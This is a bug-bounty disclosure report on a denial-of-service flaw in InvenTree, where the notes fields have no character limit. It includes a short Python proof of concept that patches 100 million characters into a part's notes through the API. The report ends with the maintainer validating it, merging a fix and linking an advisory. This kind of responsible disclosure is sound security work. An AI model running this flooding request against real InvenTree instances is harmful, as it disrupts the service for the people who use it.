Lack of Character Limit in Notes Sections Leads to Denial of Service in inventree/inventree

Valid

Reported on

Jun 19th 2022


Description

The InvenTree application allows for the inclusion of notes for various objects in the application. The notes functionality does not include a character limit. An attacker can submit an infinite number of characters into the notes section, which causes a denial of service and increased processor usage for the victim. The tester tested against the Stock Parts and Parts notes sections. Tester assumes that other objects in the application that have notes available would also be vulnerable, however did not test it due to consumption of local resources.

Tester was able to add in excess of one hundred million (100,000,000) characters or more with the included PoC during testing.

Proof of Concept

import requests as request_handler

burp0_url = "http://192.168.1.5:8000/api/part/1/"
burp0_cookies = {"csrftoken": "L433DJ0Xtp97EpAMROtkIyLX8KZsXWUxGYHZTcUET4WXL0EtbqgZYydelin9y4G7", "sessionid": "un2jcwzkr7ofla5c3vmfwfjw7z38blj3"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.5:8000/part/1/", "Content-Type": "application/json", "X-CSRFToken": "L433DJ0Xtp97EpAMROtkIyLX8KZsXWUxGYHZTcUET4WXL0EtbqgZYydelin9y4G7", "X-Requested-With": "XMLHttpRequest", "Origin": "http://192.168.1.5:8000", "DNT": "1", "Connection": "close"}
echo_time = "A"*100000000
burp0_json={"notes": echo_time}
request = request_handler.patch(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json)
print(request.text)
print(request.status_code)

Impact

Should a user visit one of the exploited parts, the vulnerable page will not load appropriately. The victim may see their computer become unresponsive as the processor works to process the amount of data being served by the vulnerable notes section.

Recommendation

Apply a consistent character limit across the application where user input can be added to notes sections.

We are processing your report and will contact the inventree team within 24 hours. 7 days ago
Joe Helle modified the report
7 days ago
Joe Helle modified the report
7 days ago
Joe Helle modified the report
7 days ago
Joe Helle modified the report
7 days ago
We have contacted a member of the inventree team and are waiting to hear back 6 days ago
Oliver
6 days ago

Maintainer


Thanks for the report Joe, we will look into this one ASAP.

Joe Helle
6 days ago

Researcher


Please let me know if you need anything from me. Thanks!

Oliver validated this vulnerability 5 days ago
Joe Helle has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Oliver confirmed that a fix has been merged on 63b4ff 5 days ago
Oliver has been awarded the fix bounty
Joe Helle
5 days ago

Researcher


@admin @maintainer can we have a CVE for this one?

Oliver
5 days ago

Maintainer


https://github.com/inventree/InvenTree/security/advisories/GHSA-mmm6-rwf8-ghv3

Jamie Slome
5 days ago

Admin


Sorted 👍

Joe Helle
5 days ago

Researcher


Thanks Jamie!

to join this conversation